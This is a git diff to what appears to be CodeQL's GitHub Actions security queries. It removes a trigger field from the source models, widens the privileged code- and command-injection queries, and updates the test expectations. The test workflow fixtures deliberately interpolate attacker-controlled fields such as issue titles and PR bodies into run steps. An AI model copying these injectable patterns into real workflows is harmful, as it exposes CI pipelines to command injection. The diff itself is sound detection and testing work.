a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index a8a54dbda29..3bc1dcc4759 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6fefec9a4f8..41a9c337f49 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "PR changed files"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index ffde7dc6a91..b6c75a06e57 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index d7cbde25b88..2e5b0d42efd 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index b872bbe2ed0..18339bfa4e9 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 1618eddf2d8..a7afc090a91 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 7c681d8a64b..7890668fa87 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 9b6649892af..1946b78f5fd 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 6ce7dd68b3f..d4b083e14d2 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] + - ["tzkhan/pr-update-action", "*", "output.headMatch", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 72df42535db..31a1eb5bde9 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index 6f66535e6a4..2f9a09f59c3 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -16,14 +16,16 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w where CommandInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 69ab240616e..62030e32263 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,14 +18,16 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w where CodeInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 5395fe82453..a8a0414dd9f 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -313,48 +313,46 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | -| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | -| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | -| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | -| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | -| tj-actions/branch-names | * | output.head_ref_branch | pull_request_target | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed files | -| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | -| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | -| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +| ahmadnassri/action-changed-files | * | output.files | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | +| dorny/paths-filter | * | output.changes | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | +| jitterbit/get-changed-files | * | output.added | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | +| jitterbit/get-changed-files | * | output.all | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | +| jitterbit/get-changed-files | * | output.modified | PR changed files | +| jitterbit/get-changed-files | * | output.removed | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| tj-actions/branch-names | * | output.current_branch | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | PR changed files | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | +| tj-actions/changed-files | * | output.copied_files | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | +| tj-actions/changed-files | * | output.modified_files | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | | +| xt0rted/slash-command-action | * | output.command-arguments | | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 268396a711e..d56ec73e26f 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -49,8 +49,8 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string trigger, string kind) { - sourceModel(action, version, output, trigger, kind) +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 215b3252885..995fefe4a15 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined - - run: echo '${{ github.event.issue.body }}' # not defined + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index e818ced0c1d..7061f509b81 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -230,6 +230,10 @@ subpaths | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | @@ -253,6 +257,8 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | @@ -271,6 +277,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 